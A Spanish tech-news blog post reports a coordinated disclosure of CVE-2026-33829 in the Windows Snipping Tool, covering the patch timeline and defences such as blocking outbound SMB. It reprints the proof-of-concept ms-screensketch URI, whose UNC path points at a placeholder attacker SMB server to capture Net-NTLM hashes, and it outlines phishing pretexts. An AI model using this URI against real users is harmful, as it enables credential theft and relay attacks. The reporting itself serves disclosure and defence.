Tutoriales y Manuales
Entradas Mensuales
-
▼
2026
(Total:
2960
)
-
▼
abril
(Total:
635
)
-
Fundación Linux se amplía y absorbe el software Op...
-
Archiv.org, nuestra memoria digital, podría desapa...
-
12 extensiones de navegador que imitan descargador...
-
Linux 7.1 incluirá un nuevo driver para NTFS
-
TotalRecall Reloaded encuentra que Windows Recuerd...
-
Casi la mitad de la música que se sube a Deezer ha...
-
En Europa a partir de de 2027 podrás cambiar la ba...
-
Falla en iTerm2 abusa de secuencias de escape SSH ...
-
Mustafa Suleyman, jefe de la IA de Microsoft: "Si ...
-
Quién es John Ternus, el nuevo CEO de Apple que su...
-
GitHub limita el uso de la IA para reducir costes
-
Exploit de prueba para fuga de hash NTLM en la her...
-
Presentado el Oppo Find X9 Ultra, un móvil de 1.69...
-
WhatsApp de pago empieza a desplegarse en Europa
-
PC construido con LEGO parece un Mac retro… pero e...
-
Vulnerabilidad crítica de MCP de Anthropic permite...
-
La optimización de Valve para GPU con poca VRAM en...
-
Un telescopio equipado con 5.000 robots crea el ma...
-
LaLiga logra una multa histórica de 43 millones de...
-
Kimi, la IA china que supera a ChatGPT y Claude, l...
-
Los AMD Ryzen con 3D V-Cache también son los más r...
-
La crisis de la RAM no se acabará hasta 2027
-
Python se resiste a perder el trono y prepara una ...
-
Amazon invertirá hasta 25.000 millones de dólares ...
-
RedSun, UnDefend y BlueHammer, las vulnerabilidade...
-
Intel y fabricantes lanzan las memorias RAM HUDIMM...
-
Ni 900 ni 800, el prefijo 400 será obligatorio par...
-
Crean un adaptador PCIe a M.2 plano que nos permit...
-
Crean un "Museo Auditivo" interactivo en línea con...
-
Los reguladores supervisan a la IA Mythos de Anthr...
-
CISA advierte que el paquete npm Axios fue comprom...
-
LXQt 2.4: el escritorio ligero se actualiza con me...
-
WhatsApp empieza a probar su suscripción de pago
-
Ciudadano británico admite hackear empresas y roba...
-
Atacantes convierten QEMU en un sigiloso backdoor ...
-
AMD FSR Multi Frame Generation: lanzamiento inminente
-
Bjarne Stroustrup, padre de C++: "Solo hay dos tip...
-
Batacazo para Jeff Bezos: el cohete New Glenn de B...
-
Falla un HDD en garantía y el cliente se topa con ...
-
Vercel confirma un incidente tras la brecha de seg...
-
GitHub se convierte en objetivo de los sistemas an...
-
Desde noviembre de 2026 tendrás que devolver las b...
-
Microsoft trabaja para eliminar los elementos anti...
-
Apple retrasa los próximos Mac a causa de la escas...
-
La NSA confirma uso de Mythos de Anthropic pese a ...
-
La memoria RAM sube un 110% y los SSD un 147% en Q...
-
HONOR WIN H9, el primer portátil con «pantalla 3D ...
-
El NIST adopta un modelo de NVD basado en riesgos ...
-
Google usa Gemini AI para frenar anuncios malicios...
-
CachyOS lanza un "super kernel" de Linux 7.0 con i...
-
Vulnerabilidad crítica en Flowise permite ejecució...
-
Toshiba se niega a reemplazar discos duros en gara...
-
Cisco publica actualizaciones críticas para correg...
-
Actualizar de Windows 10 a Windows 11 reduce el re...
-
Cómo saber si tu conexión la bloquea LaLiga
-
Galaxy S27 podría cambiarlo todo gracias a una bat...
-
Brecha de seguridad en Vercel
-
La memoria HUDIMM es una solución hasta superar la...
-
Microsoft implementará agentes de IA en la barra d...
-
Nuevas filtraciones señalan que los procesadores N...
-
SK Hynix lleva la LPDDR5X a los servidores de IA c...
-
Vercel confirma filtración de datos: accedieron a ...
-
Steve Jobs y Wozniak hicieron una llamada falsa al...
-
NVIDIA recorta hasta un 40% la producción de GPU g...
-
Encuentra 72 módulos de 32 GB de RAM nuevos en la ...
-
Intel Arc B390 frente a Radeon 890M y Radeon 8060s
-
Intel Nova Lake-S: memoria caché monumental para d...
-
Utilizan CVE-2024-3721 para infectar DVR de TBK co...
-
La RTX PRO 6000 Blackwell de 96 GB es tan rápida c...
-
GitHub Store es el la nueva tienda de aplicaciones...
-
Un robot humanoide chino supera el récord mundial ...
-
Valve se duerme con la Steam Machine y su competen...
-
Zhitai TiPlus 9100: el primer SSD PCIe 5.0 de alto...
-
GitHub se une a Anthropic, Google, Amazon (AWS) y ...
-
Cuidado si recibes un correo de cambio de cuenta d...
-
Trucos para no agotar los limites de uso de Claude
-
Microsoft mejora el Explorador de archivos de Wind...
-
Intel Core Ultra 400D y 400DX: CPUs con hasta 288 ...
-
OpenCode es una IA de código abierto para programa...
-
Las series hechas con IA se salen de control en Ch...
-
Los expertos advierten: no le pidas consejos de pa...
-
ChatGPT podría empezar a "recordar" tu cara en fut...
-
Anthropic convierte a Claude en una herramienta de...
-
Una vulnerabilidad del buscador IA Windows Recall ...
-
PS6 frente a PS5 en trazado de rayos: el rendimien...
-
Meta se prepara para su mayor cantidad de despidos...
-
Samsung abandona la producción de memoria LPDDR4/L...
-
Netflix sube de precio todos sus planes en España
-
Netflix cambia para siempre su app: llegan los víd...
-
Microsoft vuelve a empujar Edge en Windows 11
-
ASUS muestra unos módulos de memoria HUDIMM DDR5: ...
-
El gran rediseño de WhatsApp en iPhone ya está lle...
-
ChatGPT Proyectos: un chat personalizado para cada...
-
La inteligencia artificial superará a los programa...
-
¿Qué es una 'Release Candidate' (RC) de Linux?
-
El popular traductor de texto DeepL Translate ahor...
-
Misterioso usuario de Steam lleva más de 20.000 re...
-
Vulnerabilidad de día cero en Microsoft SharePoint...
-
La escasez de CPU ya supera a la de memoria y pone...
-
Antiguos empleados de Apple, Qualcomm y Nuvia se u...
-
-
▼
abril
(Total:
635
)
-
►
2025
(Total:
2103
)
- ► septiembre (Total: 148 )
-
►
2024
(Total:
1110
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
Entradas populares
-
Microsoft ha publicado actualizaciones de seguridad urgentes para abordar una vulnerabilidad crítica en Windows Active Directory que permit...
-
Un pequeño dispositivo pluggable de factor de forma (SFP) es un dispositivo de interfaz de red que cumple con un estándar, conectando equi...
-
Jeyi lanza un adaptador PCIe a M.2 plano llamado AIC ArcherX que permite conectar un SSD M.2 en ranuras PCIe inferiores bloqueadas por GP...
Exploit de prueba para fuga de hash NTLM en la herramienta de recortes de Windows
Se ha publicado públicamente un exploit de prueba de concepto (PoC) para una vulnerabilidad recientemente descubierta en la Herramienta de Recortes de Microsoft que permite a los atacantes robar de forma silenciosa los hashes de credenciales Net-NTLM de los usuarios al engañarlos para que visiten una página web maliciosa. Registrada como CVE-2026-33829, la falla reside en cómo la Herramienta de Recortes de Windows maneja los registros de URI de enlaces profundos utilizando el esquema de protocolo ms-screensketch.
Se ha publicado públicamente un exploit de prueba de concepto (PoC) para una vulnerabilidad recién descubierta en la Herramienta de Recortes de Microsoft que permite a los atacantes robar silenciosamente los hashes de credenciales Net-NTLM de los usuarios al engañarlos para que visiten una página web maliciosa.
Registrada como CVE-2026-33829, la falla reside en cómo la Herramienta de Recortes de Windows maneja los registros de URI de enlaces profundos usando el esquema de protocolo ms-screensketch. Las versiones afectadas de la aplicación registran este enlace profundo, que acepta un parámetro filePath.
Debido a la falta de una validación adecuada de entradas, un atacante puede proporcionar una ruta UNC que apunte a un servidor SMB remoto controlado por él, forzando una conexión SMB autenticada y capturando el hash Net-NTLM de la víctima en el proceso.
La vulnerabilidad fue descubierta e informada por investigadores de seguridad de Black Arrow, quienes coordinaron su divulgación con Microsoft antes de hacerla pública.
Cómo funciona el ataque
La explotación requiere una sofisticación técnica mínima. Un atacante simplemente necesita alojar una URL maliciosa —o una página HTML que active automáticamente el enlace profundo— y convencer a la víctima de que la visite. El PoC de Black Arrow Security demuestra el ataque con un único URI activado desde el navegador:
textms-screensketch:edit?&filePath=\\<servidor-smb-del-atacante>\file.png&isTemporary=false&saved=true&source=Toast
Cuando una víctima abre este enlace, la Herramienta de Recortes se inicia e intenta silenciosamente cargar el recurso remoto a través de SMB. Durante este intento de conexión, Windows transmite automáticamente la respuesta de autenticación Net-NTLM del usuario al servidor del atacante, exponiendo credenciales que luego pueden ser descifradas sin conexión o usadas en ataques de relay NTLM contra recursos de la red interna.

Lo que hace que CVE-2026-33829 sea particularmente peligroso es lo naturalmente que se presta a campañas de ingeniería social. Como la Herramienta de Recortes realmente se abre durante la explotación, el ataque es visualmente consistente con pretextos creíbles, como pedir a un empleado que recorte un fondo de pantalla corporativo, edite una foto de identificación o revise un documento de RRHH.
Un atacante podría registrar un dominio como snip.ejemplo.com y servir una URL de imagen convincente que entregue silenciosamente la carga útil del enlace profundo malicioso en segundo plano.
La víctima no ve nada inusual; la Herramienta de Recortes se abre como se espera mientras la autenticación NTLM ocurre de manera transparente en segundo plano.
Este vector de ataque es especialmente efectivo en entornos corporativos donde los correos de phishing que hacen referencia a portales internos de RRHH, mesas de ayuda de TI o sistemas de documentos compartidos son comunes.
Disponibilidad del parche y cronología
Microsoft solucionó la vulnerabilidad en su actualización de seguridad del Patch Tuesday del 14 de abril de 2026. La cronología de divulgación es la siguiente:
- 23 de marzo de 2026 — Vulnerabilidad reportada a Microsoft.
- 14 de abril de 2026 — Microsoft lanza un parche de seguridad.
- 14 de abril de 2026 — Publicación coordinada del aviso y el PoC.
Las organizaciones y usuarios individuales que utilicen versiones afectadas de la Herramienta de Recortes de Windows deben aplicar inmediatamente la actualización de seguridad del 14 de abril de 2026.
Los equipos de seguridad también deben monitorear las redes internas en busca de conexiones SMB salientes inesperadas (puerto 445) hacia hosts externos o desconocidos, lo que podría indicar intentos de explotación activos. Bloquear el tráfico SMB saliente en el perímetro de la red sigue siendo una medida defensiva sólida, independientemente del estado del parche.
Fuentes:
https://cybersecuritynews.com/windows-snipping-tool-ntlm-hash/



Entrada más reciente
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.